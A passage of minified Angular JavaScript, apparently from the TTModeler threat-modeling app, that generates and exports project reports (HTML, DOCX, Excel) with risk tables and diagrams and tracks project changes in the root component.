0:ut.length)>0&&(this.createParagraph(this.translate.instant("general.Tasks")),this.createUL(Ne.Tasks.map(yt=>this.translate.instant(yt.IsChecked?"general.Done":"general.DoneNot")+": "+yt.Note))),(null===(Ze=Ne.Notes)||void 0===Ze?void 0:Ze.length)>0&&(this.createParagraph(this.translate.instant("general.Notes")),this.createUL(Ne.Notes.map(yt=>new Date(Number(yt.Date)).toLocaleDateString()+" - "+yt.Author+": "+yt.Note))),Ne.Countermeasures.length>0&&this.createParagraph(this.translate.instant("general.Countermeasures")+": "+Ne.Countermeasures.map(yt=>yt.GetLongName()).join(", ")),this.createParagraph("")})),this.Project.HasTesting&&this.ShowTestCases){this.createSubHeading(this.translate.instant("general.TestCases")),this.createParagraph(this.translate.instant("report.testCaseExplanation")),this.createParagraph("");const Ne=this.Project.GetTesting().TestCases;for(let et=0;et<Ne.length;et++){const ut=Ne[et];this.createBoldParagraph(ut.GetLongName()),this.createParagraph(this.translate.instant("properties.Status")+": "+this.translate.instant($g.ToString(ut.Status))),(null===(r=ut.Description)||void 0===r?void 0:r.length)>0&&this.createParagraph(this.translate.instant("properties.Description")+": "+ut.Description),ut.Version&&this.createParagraph(this.translate.instant("pages.modeling.testcase.verison")+": "+ut.Version),ut.PreConditions.length>0&&(this.createParagraph(this.translate.instant("properties.PreConditions")),this.createUL(ut.PreConditions)),ut.Steps.length>0&&(this.createParagraph(this.translate.instant("properties.Steps")),this.createOL(ut.Steps)),ut.TestData.length>0&&(this.createParagraph(this.translate.instant("properties.TestData")),this.createUL(ut.TestData)),ut.Summary.length>0&&(this.createParagraph(this.translate.instant("properties.Summary")),this.createUL(ut.Summary.map(Ze=>Ze.Note))),ut.Images.length>0&&this.createParagraph(this.translate.instant("general.Images"));for(let Ze=0;Ze<ut.Images.length;Ze++){const yt=ut.Images[Ze];yield(St=>x2(this,void 0,void 0,function*(){const Nt=new Image;return Nt.src=St,yield Nt.decode(),Nt}))(yt).then(St=>{this.createImage(yt,St.naturalWidth,St.naturalHeight),this.createParagraph("")})}1==ut.LinkedElements.length&&this.createParagraph(this.translate.instant("properties.LinkedElements")+": "+ut.LinkedElements[0].GetProperty("Name")+" in "+ut.GetViewOfLinkedElement(ut.LinkedElements[0]).Name),ut.LinkedElements.length>1&&(this.createParagraph(this.translate.instant("properties.LinkedElements")),this.createUL(ut.LinkedElements.map(Ze=>Ze.GetProperty("Name")+" in "+ut.GetViewOfLinkedElement(Ze).Name))),1==ut.LinkedScenarios.length&&this.createParagraph(this.translate.instant("properties.LinkedScenarios")+": "+ut.LinkedScenarios[0].GetProperty("Name")+" in "+this.Project.GetView(ut.LinkedScenarios[0].ViewID).Name),ut.LinkedScenarios.length>1&&(this.createParagraph(this.translate.instant("properties.LinkedScenarios")),this.createUL(ut.LinkedScenarios.map(Ze=>Ze.GetLongName()+" in "+this.Project.GetView(Ze.ViewID).Name))),1==ut.LinkedMeasures.length&&this.createParagraph(this.translate.instant("properties.LinkedMeasures")+": "+ut.LinkedMeasures[0].GetProperty("Name")+" in "+this.Project.GetView(ut.LinkedMeasures[0].ViewID).Name),ut.LinkedMeasures.length>1&&(this.createParagraph(this.translate.instant("properties.LinkedMeasures")),this.createUL(ut.LinkedMeasures.map(Ze=>Ze.GetLongName()+" in "+this.Project.GetView(Ze.ViewID).Name))),this.createParagraph("")}}Array.from(this.content.nativeElement.children).forEach(Ne=>this.content.nativeElement.removeChild(Ne)),this.htmlBuffer.forEach(Ne=>this.content.nativeElement.appendChild(Ne)),this.IsReportGenerated=!0,this.IsReportGenerating=!1}))})}SaveHTML(){let e="<!DOCTYPE html>\n<html>\n<head><title>TTModeler Report: "+this.Project.GetProjectName()+"</title></head><body>";e+=this.content.nativeElement.innerHTML,e+="</body></html>";const i=new Blob([e]);(0,yM.saveAs)(i,this.Project.Name.replace(".ttmp",".html"))}SaveDOCX(){const e=new ma.Document({numbering:{config:[{levels:[{level:0,format:ma.LevelFormat.DECIMAL,text:"%1.",alignment:ma.AlignmentType.START,style:{paragraph:{indent:{left:(0,ma.convertInchesToTwip)(.5),hanging:(0,ma.convertInchesToTwip)(.25)}}}}],reference:"my-numbering"}]},creator:this.dataService.UserDisplayName,description:this.dataService.Project.Description,title:this.dataService.Project.GetProjectName(),styles:{default:{document:{run:{font:"Calibri"}},heading1:{paragraph:{spacing:{before:120}}},heading2:{paragraph:{spacing:{before:120}}},heading3:{paragraph:{spacing:{before:120}}}}},sections:[{children:this.docxBuffer}]});ma.Packer.toBuffer(e).then(i=>{const n=new Blob([i]);(0,yM.saveAs)(n,this.Project.Name.replace(".ttmp",".docx"))})}SaveExcel(){return x2(this,void 0,void 0,function*(){const e=[];this.exportTemplates.forEach(i=>{const n=[],r=[];i.Template.map(c=>c.name).forEach(c=>r.push({value:c,fontWeight:"bold"})),n.push(r),i.GetRowData(this.translate).forEach(c=>{const d=[];c.forEach(T=>d.push({value:T})),n.push(d)}),e.push(n)}),yield $Z(e,{fileName:this.dataService.Project.Name.replace(".ttmp",".xlsx"),sheets:this.exportTemplates.map(i=>i.Name)})})}AddTemplate(){this.selectedExportTemplate=this.dataService.Project.CreateExportTemplate()}DeleteTemplate(e){this.dialog.OpenDeleteObjectDialog(e).subscribe(i=>{i&&(e==this.selectedExportTemplate&&(this.selectedExportTemplate=null),this.dataService.Project.DeleteExportTemplate(e))})}initializeReportHTML(){return new Promise(e=>{this.readFile("./assets/icons/favicon.192x192.png").then(i=>{const n=this.createHtmlTitle("TTModeler Report "),r=document.createElement("img");r.src=i,r.style.width="50px",r.style.marginLeft="20px",r.style.verticalAlign="middle",r.alt="logo",n.appendChild(r),this.htmlBuffer=[n],this.htmlBuffer.push(this.createHtmlParagraph(this.translate.instant("report.for"))),this.htmlBuffer.push(this.createHtmlTitle(this.Project.GetProjectName())),this.htmlBuffer.push(this.createHtmlParagraph((new Date).toLocaleDateString()+", Version "+this.Project.UserVersion)),e()})})}initializeReportDOCX(){return new Promise(e=>{this.readFile("./assets/icons/favicon.192x192.png").then(i=>{this.docxBuffer=[new ma.Paragraph({text:"TTModeler Report     ",heading:ma.HeadingLevel.TITLE,children:[new ma.ImageRun({data:i,transformation:{width:50,height:50}})]}),this.createDocxParagraph(this.translate.instant("report.for")),this.createDocxTitle(this.Project.GetProjectName()),this.createParagraph(""),this.createDocxParagraph(this.GetDate().toLocaleDateString()+", Version "+this.Project.UserVersion),this.createParagraph("")],e()})})}createUL(e){this.createDocxUL(e),this.createHtmlUL(e)}createDocxUL(e){e.forEach(i=>{const n=new ma.Paragraph({text:i,bullet:{level:0}});this.docxBuffer.push(n)})}createHtmlUL(e){const i=document.createElement("ul");e.forEach(n=>{i.appendChild(this.createHtmlElement("li",n))}),this.htmlBuffer.push(i)}createOL(e){this.createDocxOL(e),this.createHtmlOL(e)}createDocxOL(e){e.forEach(i=>{const n=new ma.Paragraph({text:i,numbering:{reference:"my-numbering",level:0}});this.docxBuffer.push(n)})}createHtmlOL(e){const i=document.createElement("ol");e.forEach(n=>{i.appendChild(this.createHtmlElement("li",n))}),this.htmlBuffer.push(i)}createTitle(e){this.docxBuffer.push(this.createDocxTitle(e)),this.htmlBuffer.push(this.createHtmlTitle(e))}createDocxTitle(e){return new ma.Paragraph({text:e,heading:ma.HeadingLevel.TITLE})}createHtmlTitle(e){return this.createHtmlElement("h1",e)}createHeading(e){this.docxBuffer.push(this.createDocxHeading(e)),this.htmlBuffer.push(this.createHtmlHeading(e))}createDocxHeading(e){return new ma.Paragraph({text:e,heading:ma.HeadingLevel.HEADING_1})}createHtmlHeading(e){return this.createHtmlElement("h2",e)}createSubHeading(e){this.docxBuffer.push(this.createDocxSubHeading(e)),this.htmlBuffer.push(this.createHtmlSubHeading(e))}createDocxSubHeading(e){return new ma.Paragraph({text:e,heading:ma.HeadingLevel.HEADING_2})}createHtmlSubHeading(e){return this.createHtmlElement("h3",e)}createSubSubHeading(e){this.docxBuffer.push(this.createDocxSubSubHeading(e)),this.htmlBuffer.push(this.createHtmlSubSubHeading(e))}createDocxSubSubHeading(e){return new ma.Paragraph({text:e,heading:ma.HeadingLevel.HEADING_3})}createHtmlSubSubHeading(e){return this.createHtmlElement("h4",e)}createSubSubSubHeading(e){this.docxBuffer.push(this.createDocxSubSubSubHeading(e)),this.htmlBuffer.push(this.createHtmlSubSubSubHeading(e))}createDocxSubSubSubHeading(e){return new ma.Paragraph({text:e,heading:ma.HeadingLevel.HEADING_4})}createHtmlSubSubSubHeading(e){return this.createHtmlElement("h5",e)}createParagraph(e){this.docxBuffer.push(this.createDocxParagraph(e)),this.htmlBuffer.push(this.createHtmlParagraph(e))}createDocxParagraph(e){return new ma.Paragraph({text:e})}createHtmlParagraph(e){return this.createHtmlElement("p",e)}createBoldParagraph(e){this.docxBuffer.push(this.createDocxBoldParagraph(e)),this.htmlBuffer.push(this.createHtmlBoldParagraph(e))}createDocxBoldParagraph(e){return new ma.Paragraph({children:[new ma.TextRun({text:e,bold:!0})]})}createHtmlBoldParagraph(e){const i=this.createHtmlElement("strong",e),n=document.createElement("p");return n.appendChild(i),n}createLink(e,i){this.docxBuffer.push(this.createDocxLink(e,i)),this.htmlBuffer.push(this.createHtmlLink(e,i))}createDocxLink(e,i){return new ma.Paragraph({children:[new ma.ExternalHyperlink({children:[new ma.TextRun({text:e,style:"Hyperlink"})],link:i})]})}createHtmlLink(e,i){const n=this.createHtmlElement("a",e);return n.href=i,n.target="_blank",n}createTable(e,i){this.docxBuffer.push(this.createDocxTable(e,i)),this.htmlBuffer.push(this.createHTMLTable(e,i))}createDocxTable(e,i){const n=[];let r=new ma.TableRow({children:[]});return e.forEach(d=>{r.addChildElement(new ma.TableCell({children:[new ma.Paragraph({children:[new ma.TextRun({text:d.toString(),bold:!0})],alignment:d==e[0]?ma.AlignmentType.LEFT:ma.AlignmentType.CENTER})],verticalAlign:ma.VerticalAlign.CENTER}))}),n.push(r),i.forEach(d=>{r=new ma.TableRow({children:[]}),d.forEach(T=>{r.addChildElement(new ma.TableCell({children:[new ma.Paragraph({text:T.toString(),alignment:T==d[0]?ma.AlignmentType.LEFT:ma.AlignmentType.CENTER})]}))}),n.push(r)}),new ma.Table({rows:n,borders:ma.TableBorders.NONE})}createHTMLTable(e,i){const n=document.createElement("table"),r=document.createElement("thead");let c=document.createElement("tr");e.forEach(T=>c.appendChild(this.createHtmlElement("th",T))),c.children.item(0).style.textAlign="left",Array.from(c.children).filter((T,k)=>k>=1).forEach(T=>{T.style.padding="0 5px"}),r.appendChild(c),n.appendChild(r);const d=document.createElement("tbody");return i.forEach(T=>{c=document.createElement("tr"),T.forEach(k=>c.appendChild(this.createHtmlElement("td",k))),Array.from(c.children).filter((k,q)=>q>=1).forEach(k=>{const q=k;q.style.textAlign="center",q.style.padding="0 5px"}),d.appendChild(c)}),n.appendChild(d),n}createRiskTable(){this.docxBuffer.push(this.createDocxRiskTable()),this.htmlBuffer.push(this.createHTMLRiskTable())}createDocxRiskTable(){const e=(T,k=!1,q=ma.TextDirection.LEFT_TO_RIGHT_TOP_TO_BOTTOM,Y=1,te=1,pe="#FFFFFF")=>new ma.TableCell({children:[new ma.Paragraph({children:[new ma.TextRun({text:T.toString(),bold:k})],alignment:ma.AlignmentType.CENTER})],shading:{fill:pe,type:ma.ShadingType.CLEAR,color:"auto"},textDirection:q,columnSpan:Y,rowSpan:te}),i=[];let n=new ma.TableRow({children:[]});n.addChildElement(e("")),n.addChildElement(e("")),n.addChildElement(e(this.translate.instant("properties.Severity"),!0,ma.TextDirection.LEFT_TO_RIGHT_TOP_TO_BOTTOM,4)),i.push(n),n=new ma.TableRow({children:[]});let r=["","","Low","Medium","High","Critical"];r.forEach(T=>{n.addChildElement(e(T.length>0?this.translate.instant("properties.threatseverity."+T):""))}),i.push(n),n=new ma.TableRow({children:[]}),n.addChildElement(e(this.translate.instant("general.Likelihood"),!0,ma.TextDirection.BOTTOM_TO_TOP_LEFT_TO_RIGHT,1,3)),r=["High","Medium","High","High","Critical"];let c=["#FFFFFF","#fcff2f","#fe0000","#fe0000","#cb0000"];for(let T=0;T<r.length;T++)n.addChildElement(e(r[T].length>0?this.translate.instant("properties.threatseverity."+r[T]):"",!1,ma.TextDirection.LEFT_TO_RIGHT_TOP_TO_BOTTOM,1,1,c[T]));i.push(n),n=new ma.TableRow({children:[]}),r=["Medium","Low","Medium","High","Critical"],c=["#FFFFFF","#34ff34","#fcff2f","#fe0000","#cb0000"];for(let T=0;T<r.length;T++)n.addChildElement(e(r[T].length>0?this.translate.instant("properties.threatseverity."+r[T]):"",!1,ma.TextDirection.LEFT_TO_RIGHT_TOP_TO_BOTTOM,1,1,c[T]));i.push(n),n=new ma.TableRow({children:[]}),r=["Low","Low","Medium","Medium","High"],c=["#FFFFFF","#34ff34","#fcff2f","#fcff2f","#fe0000"];for(let T=0;T<r.length;T++)n.addChildElement(e(r[T].length>0?this.translate.instant("properties.threatseverity."+r[T]):"",!1,ma.TextDirection.LEFT_TO_RIGHT_TOP_TO_BOTTOM,1,1,c[T]));return i.push(n),new ma.Table({rows:i,borders:ma.TableBorders.NONE})}createHTMLRiskTable(){const e=document.createElement("table");e.style.borderSpacing="5px";const i=document.createElement("tbody");let n=document.createElement("tr");n.appendChild(this.createHtmlElement("td","")),n.appendChild(this.createHtmlElement("td",""));let r=this.createHtmlElement("td","");r.appendChild(this.createHtmlElement("strong",this.translate.instant("properties.Severity"))),r.colSpan=4,n.appendChild(r),i.appendChild(n),n=document.createElement("tr");let c=["","","Low","Medium","High","Critical"];c.forEach(T=>{let k=this.createHtmlElement("td",T.length>0?this.translate.instant("properties.threatseverity."+T):"");n.appendChild(k)}),i.appendChild(n),n=document.createElement("tr"),r=this.createHtmlElement("td",""),r.appendChild(this.createHtmlElement("strong",this.translate.instant("general.Likelihood"))),r.rowSpan=3,n.appendChild(r),c=["High","Medium","High","High","Critical"];let d=["transparent","#fcff2f","#fe0000","#fe0000","#cb0000"];for(let T=0;T<c.length;T++){let k=this.createHtmlElement("td",this.translate.instant("properties.threatseverity."+c[T]));k.style.backgroundColor=d[T],n.appendChild(k)}i.appendChild(n),n=document.createElement("tr"),c=["Medium","Low","Medium","High","Critical"],d=["transparent","#34ff34","#fcff2f","#fe0000","#cb0000"];for(let T=0;T<c.length;T++){let k=this.createHtmlElement("td",this.translate.instant("properties.threatseverity."+c[T]));k.style.backgroundColor=d[T],n.appendChild(k)}i.appendChild(n),n=document.createElement("tr"),c=["Low","Low","Medium","Medium","High"],d=["transparent","#34ff34","#fcff2f","#fcff2f","#fe0000"];for(let T=0;T<c.length;T++){let k=this.createHtmlElement("td",this.translate.instant("properties.threatseverity."+c[T]));k.style.backgroundColor=d[T],n.appendChild(k)}return i.appendChild(n),Array.from(i.children).forEach(T=>{Array.from(T.children).forEach(k=>k.style.textAlign="center")}),e.appendChild(i),e}createImage(e,i,n){this.docxBuffer.push(this.createDocxImage(e,i,n)),this.htmlBuffer.push(this.createHtmlImage(e))}createDocxImage(e,i,n){const c=600>i?1:600/i;return new ma.Paragraph({children:[new ma.ImageRun({data:e,transformation:{width:i*c,height:n*c}})],alignment:ma.AlignmentType.CENTER})}createHtmlImage(e){const i=document.createElement("div"),n=document.createElement("img");return n.src=e,i.appendChild(n),i.style.textAlign="center",i}getComponentImage(e,i,n){return x2(this,void 0,void 0,function*(){const r=document.createElement("div");return r.appendChild(e.instance.elRef.nativeElement),r.style.width=i.toString()+"px",document.body.appendChild(r),yield new Promise(d=>setTimeout(()=>{P2t()(e.instance.elRef.nativeElement,{allowTaint:!0}).then(T=>{let k=T.toDataURL("image/png");const q=new Image;q.src=k,q.onload=()=>{let te=(te=>{const pe=document.createElement("canvas"),Re=pe.getContext("2d");return pe.width=T.width-(n[0]+n[2]),pe.height=T.height-(n[1]+n[3]),Re.drawImage(te,n[0],n[1],T.width-n[0]-n[2],T.height-n[1]-n[3],0,0,pe.width,pe.height),[pe.toDataURL(),pe.width,pe.height]})(q);document.body.removeChild(r),d(te)}})},10))})}createDiagram(e){const i=this.getDiagramImage(e);this.docxBuffer.push(this.createDocxDiagram(i[0],i[1],i[2])),this.htmlBuffer.push(this.createHtmlDiagram(i[0]))}createDocxDiagram(e,i,n){const c=600>i?1:600/i;return new ma.Paragraph({children:[new ma.ImageRun({data:e,transformation:{width:i*c,height:n*c}})]})}createHtmlDiagram(e){const i=document.createElement("img");return i.src=e,i.style.maxWidth=this.docWidth.toString()+"px",i}getDiagramImage(e){const i=as.FromJSON(JSON.parse(JSON.stringify(e.ToJSON())),this.Project,this.Project.Config),n=this.docWidth,c=document.createElement("div");c.style.width=n.toString()+"px",c.style.height=500..toString()+"px",c.style.pointerEvents="none";let d=new xb(new DOMRectReadOnly(0,0,n,500),null);this.Dia=i instanceof b2?new R7(i,this.dataService,this.theme,this.dialog,this.locStorage,this.translate,i.IsUseCaseDiagram?aa.UseCase:aa.Context):new $T(i,this.dataService,this.theme,this.dialog,this.locStorage,this.translate),this.Dia.OnResized(d,c),this.Dia.PrintMode(this.DiagramShowGrid);const T=this.Dia.FitToCanvas(n);return d=new xb(new DOMRectReadOnly(0,0,n,T[1]+10),null),c.style.height=T[1].toString()+"px",this.Dia.OnResized(d,c,!1),[this.Dia.GetImage(),n,T[1]]}createHtmlElement(e,i){const n=document.createElement(e);return n.textContent=i,n}readFile(e){return new Promise((i,n)=>{this.http.get(e,{responseType:"blob"}).subscribe(r=>{const c=new FileReader;c.onloadend=()=>{var d;i(null===(d=c.result)||void 0===d?void 0:d.toString())},c.readAsDataURL(r)})})}GetDate(){return new Date}}return t.\u0275fac=function(e){return new(e||t)(Ee(Oa),Ee(Yi),Ee(x5),Ee(Sn),Ee(Wn),Ee(Oo),Ee(rp),Ee(_r),Ee(fo))},t.\u0275cmp=Wt({type:t,selectors:[["app-reporting"]],viewQuery:function(e,i){if(1&e&&Mi(hyt,5),2&e){let n;Vt(n=Bt())&&(i.content=n.first)}},decls:40,vars:7,consts:[[1,"website-container"],[1,"drawer-container"],["mode","side","opened","",2,"border-right-width","0px"],["selectedRoute","/reporting",2,"width","100%","height","100%"],[2,"margin","10px"],["preserveContent","",2,"height","100%"],["mat-tab-label",""],["matTabContent",""],[1,"tab-icon"],["mat-raised-button","",3,"disabled","click"],["mat-icon-button","",3,"disabled","matMenuTriggerFor"],["settings","matMenu"],["mat-menu-item",""],["color","primary",3,"ngModel","ngModelChange","click"],["mat-menu-item","",4,"ngIf"],["style","display: inline; margin-left: 5px;","mode","indeterminate",3,"diameter",4,"ngIf"],["mat-raised-button","","color","primary",2,"margin-left","50px",3,"disabled","click"],["mat-raised-button","","color","primary",2,"margin-left","10px",3,"disabled","click"],[2,"margin-top","30px"],[2,"background-color","white","color","black","max-width","210mm","padding","25mm"],["reportcontent",""],["src","./assets/icons/favicon.192x192.png","alt","logo",2,"width","50px","margin-left","20px","vertical-align","middle"],[4,"ngIf"],["mode","indeterminate",2,"display","inline","margin-left","5px",3,"diameter"],[1,"row",2,"margin-bottom","10px"],[1,"column1"],[1,"prop-list","reorder-list"],["mat-subheader",""],["mat-icon-button","","matTooltipShowDelay","1000",2,"margin-left","15px",3,"matTooltip","click"],["matTooltipShowDelay","1000",3,"highlight-light","highlight-dark","matTooltip","click",4,"ngFor","ngForOf"],["mat-raised-button","","color","primary",2,"margin-top","10px","left","50%","transform","translateX(-50%)",3,"disabled","click"],[1,"column2"],[3,"template",4,"ngIf"],["matTooltipShowDelay","1000",3,"matTooltip","click"],["mat-list-icon",""],["mat-line","",2,"pointer-events","initial"],["mat-icon-button","","matTooltipShowDelay","1000",2,"margin-left","auto",3,"matTooltip","click"],[3,"template"]],template:function(e,i){1&e&&(m(0,"div",0),s(1,"\n  "),m(2,"mat-drawer-container",1),s(3,"\n    "),m(4,"mat-drawer",2),s(5,"\n      "),it(6,"app-side-nav",3),s(7,"\n    "),u(),s(8,"\n\n    "),m(9,"mat-drawer-content"),s(10,"\n      "),m(11,"div",4),s(12,"\n        "),m(13,"h2"),s(14),oe(15,"translate"),u(),s(16,"\n        "),m(17,"mat-tab-group",5),s(18,"\n          "),m(19,"mat-tab"),s(20,"\n            "),ne(21,fyt,5,3,"ng-template",6),s(22,"\n            "),ne(23,Cyt,73,40,"ng-template",7),s(24,"\n          "),u(),s(25,"\n          "),m(26,"mat-tab"),s(27,"\n            "),ne(28,yyt,5,3,"ng-template",6),s(29,"\n            "),ne(30,vyt,33,16,"ng-template",7),s(31,"\n          "),u(),s(32,"\n        "),u(),s(33,"\n      "),u(),s(34,"\n    "),u(),s(35,"\n  "),u(),s(36,"\n  "),it(37,"app-status-bar"),s(38,"\n"),u(),s(39,"\n")),2&e&&(C(9),Ct("splitter-light2",!i.theme.IsDarkMode)("splitter-dark2",i.theme.IsDarkMode),C(5),ke(re(15,5,"side-nav.reporting")))},dependencies:[Zi,Ri,Ta,Ea,oa,_u,gu,Od,da,qh,V1,Mu,Uh,wl,es,ts,Or,Lr,rc,Xo,qo,po,Pa,vg,_f,gf,uyt,Xi,T5],styles:['.column1[_ngcontent-%COMP%]{float:left;width:350px}.column2[_ngcontent-%COMP%]{float:left;width:calc(100% - 350px)}.row[_ngcontent-%COMP%]:after{content:"";display:table;clear:both}.prop-list[_ngcontent-%COMP%]   .mat-list-item[_ngcontent-%COMP%]{height:48px;cursor:pointer}.prop-list[_ngcontent-%COMP%]     .mat-list-item-content{padding:0 8px!important}.prop-list[_ngcontent-%COMP%]     .mat-list-text{padding-left:8px!important}.prop-list[_ngcontent-%COMP%]   .mat-subheader[_ngcontent-%COMP%]{display:contents}.prop-list-light[_ngcontent-%COMP%]{border-right:1px solid rgba(0,0,0,.1)}.prop-list-dark[_ngcontent-%COMP%]{border-right:1px solid rgba(255,255,255,.1)}.highlight-light[_ngcontent-%COMP%]{background-color:#0000001a}.highlight-dark[_ngcontent-%COMP%]{background-color:#ffffff1a}.property-form-field[_ngcontent-%COMP%]{width:300px}th[_ngcontent-%COMP%], td[_ngcontent-%COMP%]{text-align:center}.tab-icon[_ngcontent-%COMP%]{margin-right:8px}']}),t})()}];let Tyt=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[rn,bs.forChild(Ayt),bs]}),t})(),Eyt=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[rn,pf,Tyt]}),t})();const Dyt=["primary"],xyt=["accent"];function wyt(t,a){1&t&&(m(0,"mat-progress-bar",6),s(1,"\n"),u())}function Iyt(t,a){if(1&t){const e=Ye();m(0,"div",7),s(1,"\n  "),m(2,"div"),s(3),m(4,"button",8),he("click",function(){return be(e),Me(B().OpenReleases())}),oe(5,"translate"),s(6,"\n      "),m(7,"mat-icon",9),s(8,"open_in_new"),u(),s(9,"\n    "),u(),s(10,"\n    "),m(11,"button",8),he("click",function(){return be(e),Me(B().CloseVersionInfo())}),oe(12,"translate"),s(13,"\n      "),m(14,"mat-icon",10),s(15,"close"),u(),s(16,"\n    "),u(),s(17,"\n  "),u(),s(18,"\n"),u()}if(2&t){const e=B();ri("background-color",e.theme.Accent),C(3),ct("\n    ",e.GetVersionString(),"\n    "),C(1),at("matTooltip",re(5,5,"general.openInNew")),C(7),at("matTooltip",re(12,7,"general.Close"))}}let Ryt=(()=>{class t{constructor(e,i,n,r,c,d,T,k){this.dataService=e,this.theme=i,this.electronService=n,this.translate=r,this.locStorage=c,this.overlay=d,this.isLoadingService=T,this.kvDiffers=k,this.className="",this.isInitialized=!1,this.translate.setDefaultLang("en"),window.onbeforeunload=q=>this.dataService.OnCloseApp(q)}ngOnInit(){this.isLoading=this.isLoadingService.isLoading$(),this.electronService.isElectron||(document.onkeydown=e=>{e.ctrlKey&&"s"===e.key&&(e.preventDefault(),this.dataService.OnSave())})}ngAfterViewInit(){this.theme.ThemeChanged.subscribe(i=>{const n="darkMode";i?(document.body.classList.add(n),this.overlay.getContainerElement().classList.add(n)):(document.body.classList.remove(n),this.overlay.getContainerElement().classList.remove(n))});let e=this.locStorage.Get(si.LANGUAGE);null!=e&&this.translate.use(e),setTimeout(()=>{this.theme.Primary=getComputedStyle(this.primary.nativeElement).color,this.theme.Accent=getComputedStyle(this.accent.nativeElement).color,this.dataService.ProjectChanged.subscribe(()=>this.createDiffers()),this.dataService.ConfigChanged.subscribe(()=>this.createDiffers()),this.dataService.ProjectSaved.subscribe(()=>this.createDiffers())},10)}GetVersionString(){return Gi.Format(this.translate.instant("messages.info.versionAvailable"),this.dataService.NewVersionAvailable)}OpenReleases(){window.open("https://github.com/SecSimon/TTM/releases","_blank"),this.CloseVersionInfo()}CloseVersionInfo(){this.dataService.NewVersionAvailable=null}createDiffers(){this.diffs=[],this.configStr=this.projectStr=null,this.isInitialized=!1;let e=this.dataService.Config;null!=e&&(this.configStr=JSON.stringify(e.ToJSON()),this.configID=e.ID);let i=this.dataService.Project;null!=i&&(this.projectStr=JSON.stringify(i.ToJSON()),this.projectID=i.ID,this.createDiffer(i.GetDFDElements(),null,i.DFDElementsChanged),this.createDiffer(i.GetAttackScenarios(),null,i.AttackScenariosChanged),this.createDiffer(i.GetCountermeasures(),null,i.CountermeasuresChanged),this.createDiffer(i.GetMitigationProcesses(),null,i.MitigationProcessesChanged),this.createDiffer(i.GetComponents(),null,i.MyComponentsChanged),this.createDiffer(i.GetComponents(),"threatQuestions"),this.createDiffer(i.GetDevices(),null,null),this.createDiffer(i.GetDiagrams(),null,i.DiagramsChanged),this.createDiffer(i.GetSystemThreats(),null,i.SystemThreatsChanged),this.createDiffer(i.GetThreatActors(),null,i.ThreatActorsChanged),this.createDiffer(i.GetAssetGroups(),null,i.AssetsChanged),this.createDiffer(i.GetMyDatas(),null,i.MyDatasChanged),this.createDiffer(i.GetTestCases(),null,i.TestCasesChanged)),(this.configStr||this.projectStr)&&setTimeout(()=>{t.blockChanges=!0,this.isInitialized=!0,setTimeout(()=>{t.blockChanges=!1},1e3)},500)}createDiffer(e,i,n){let r=this.kvDiffers.find(e).create(),c=new Map,d=new Map;e.forEach(k=>{c[k.ID]=this.kvDiffers.find(i?k.Data[i]:k.Data).create(),d[k.ID]=i?k.Data[i]:k.Data}),this.diffs.push({arrayDiffer:r,differMap:c,objMap:d,sourceArray:e,key:i,event:n})}ngDoCheck(){if(this.configStr)if(this.dataService.Config&&this.configID==this.dataService.Config.ID){if(!this.dataService.Config.FileChanged){let e=JSON.stringify(this.dataService.Config.ToJSON());e!==this.configStr&&(this.configStr=e,this.dataService.Config.FileChanged=!0)}}else this.configStr=null;if(this.projectStr)if(this.dataService.Project&&this.projectID==this.dataService.Project.ID){if(!this.dataService.Project.FileChanged){let e=JSON.stringify(this.dataService.Project.ToJSON());e!==this.projectStr&&(this.projectStr=e,this.dataService.Project.FileChanged=!0)}}else this.projectStr=null;this.isInitialized&&this.diffs.forEach(e=>{let i=e.arrayDiffer.diff(e.sourceArray);i&&(i.forEachAddedItem(n=>{var r;let c=n.currentValue;e.differMap.set(c.ID,this.kvDiffers.find(e.key?c.Data[e.key]:c.Data).create()),e.objMap.set(c.ID,e.key?c.Data[e.key]:c.Data),t.blockChanges||e.event&&(e.event.emit({ID:c.ID,Type:Ja.Added}),null===(r=c.DataChanged)||void 0===r||r.subscribe(d=>e.event.emit({ID:c.ID,Type:d.Type})))}),i.forEachRemovedItem(n=>{let r=n.previousValue;e.differMap.delete(r.ID),e.objMap.delete(r.ID),e.event&&e.event.emit({ID:r.ID,Type:Ja.Removed})})),e.differMap.forEach((n,r)=>{let c=n.diff(e.objMap.get(r));c&&c.forEachChangedItem(d=>{t.blockChanges||e.event&&e.event.emit({ID:r,Type:Ja.Changed})})})})}}return t.blockChanges=!1,t.\u0275fac=function(e){return new(e||t)(Ee(Yi),Ee(Oa),Ee(ST),Ee(Sn),Ee(_r),Ee(ob),Ee($G),Ee(f1))},t.\u0275cmp=Wt({type:t,selectors:[["app-root"]],viewQuery:function(e,i){if(1&e&&(Mi(Dyt,5),Mi(xyt,5)),2&e){let n;Vt(n=Bt())&&(i.primary=n.first),Vt(n=Bt())&&(i.accent=n.first)}},hostVars:2,hostBindings:function(e,i){2&e&&_D(i.className)},decls:14,vars:4,consts:[["mode","indeterminate","style","position: absolute; top: 0; z-index: 100;",4,"ngIf"],["class","update-info",3,"backgroundColor",4,"ngIf"],["color","primary",1,"mat-button","mat-primary",2,"display","none"],["primary",""],["color","accent",1,"mat-button","mat-accent",2,"display","none"],["accent",""],["mode","indeterminate",2,"position","absolute","top","0","z-index","100"],[1,"update-info"],["mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click"],[2,"margin-right","5px"],[2,"margin-right","0px"]],template:function(e,i){1&e&&(ne(0,wyt,2,0,"mat-progress-bar",0),oe(1,"async"),s(2,"\n"),it(3,"router-outlet"),s(4,"\n"),it(5,"tour-step-template"),s(6,"\n"),ne(7,Iyt,19,9,"div",1),s(8,"\n"),it(9,"div",2,3),s(11,"\n"),it(12,"div",4,5)),2&e&&(V("ngIf",re(1,2,i.isLoading)),C(7),V("ngIf",!!i.dataService.NewVersionAvailable))},dependencies:[Ri,oa,da,Pa,hA,Nx,Mxe,Jv,Xi],styles:[".update-info[_ngcontent-%COMP%]{position:absolute;right:3px;bottom:27px;z-index:100;padding:10px;border-radius:5px;font-size:small}"]}),t})();const Syt=["scenariotable"];function kyt(t,a){1&t&&it(0,"app-attack-scenario",12),2&t&&V("attackScenario",B().selectedNode.data)}function Pyt(t,a){if(1&t&&(m(0,"h2"),s(1),u()),2&t){const e=B(2);C(1),ke(e.selectedNode.name())}}function Oyt(t,a){1&t&&(m(0,"th",43),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" 